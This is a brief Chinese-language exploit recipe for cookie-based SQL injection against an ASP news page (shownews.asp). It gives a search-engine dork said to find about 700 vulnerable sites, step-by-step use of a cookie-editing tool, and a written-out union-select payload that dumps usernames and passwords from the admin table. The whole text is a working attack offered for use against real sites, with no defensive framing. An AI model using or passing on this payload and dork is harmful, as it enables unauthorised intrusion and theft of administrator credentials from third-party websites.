注入页面:http://localhost/fyqy/shownews.asp
搜索关键词:"inurl:Imagebig_honor.asp" 有洞站达700个
利用方法:
1、利用职桂林老兵cook修改工具,在地址栏写入:http://localhost/fyqy/shownews.asp,点连接(localhost,换为相应的网址)
2、点小金锁,在cookie栏写入注入语句:id=39+and+1+like+1+union+select+1,username,password,4,5,6,7,8,9,10,11+from+admin (id=后面的39,是新闻的ID值,可以打开页面找,如果是不存在的值,则可能会出现数据连接错误的提示,请查看自行修改吧!)
3、点两次刷新,成功爆出密码 |